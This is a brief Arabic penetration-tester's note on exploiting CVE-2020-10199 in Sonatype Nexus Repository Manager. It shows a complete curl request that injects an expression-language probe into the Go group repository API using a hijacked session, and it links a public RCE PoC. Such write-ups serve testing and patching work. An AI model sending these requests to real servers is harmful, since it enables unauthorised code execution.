## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FINN79426-CVE-2020-10199
# CVE-2020-10199
في السابق أثناء اختبار الاختراق، واجهت بيئة هدف تحتوي على Nexus Repository Manager، وواجهت بعض المشاكل لكن في النهاية حصلت على شيل.
سأقوم بتوثيق ذلك بإيجاز، ليسهل الرجوع إليه مستقبلاً إذا لزم الأمر.
* * *
الإصدار المستهدف: Sonatype Nexus Repository Manager OSS 3.20.1-01
* * *
تم استخدام PoC لاختبار تنفيذ الأكواد للتأكد من وجود الثغرة. (ملاحظة: كانت هناك جلسة مسجّل دخولها، لأنه تم اكتشاف مشكلة بيانات الاعتماد الافتراضية في البيئة المستهدفة)

root@kitploit:~
curl -i -s -k -X $'POST' \
-H $'Host: vulnerable.host:8081' -H $'Content-Length: 211' -H $'Content-Type: application/json' \
-b $'NX-ANTI-CSRF-TOKEN=0.556095932101016; NXSESSIONID=1dde28fd-1606-4ee3-9c6a-0a2f10791f4b' \
--data-binary $'{\x0d\x0a \"name\": \"internal\",\x0d\x0a \"online\": true,\x0d\x0a \"storage\": {\x0d\x0a \"blobStoreName\": \"default\",\x0d\x0a \"strictContentTypeValidation\": true\x0d\x0a },\x0d\x0a \"group\": {\x0d\x0a \"memberNames\": [\"$\\\\A{7*7}\"]\x0d\x0a}\x0d\x0a}' \
$'http://vulnerable.host:8081/service/rest/beta/repositories/go/group'
* * *
جرّبت PoC الخاصة بـ RCE المتداولة على الإنترنت، لكنها لم تنجح.
يمكن ملاحظة أن المخرجات أعادت الـ payload كما هي دون تغيير.
https://github.com/jas502n/CVE-2020-10199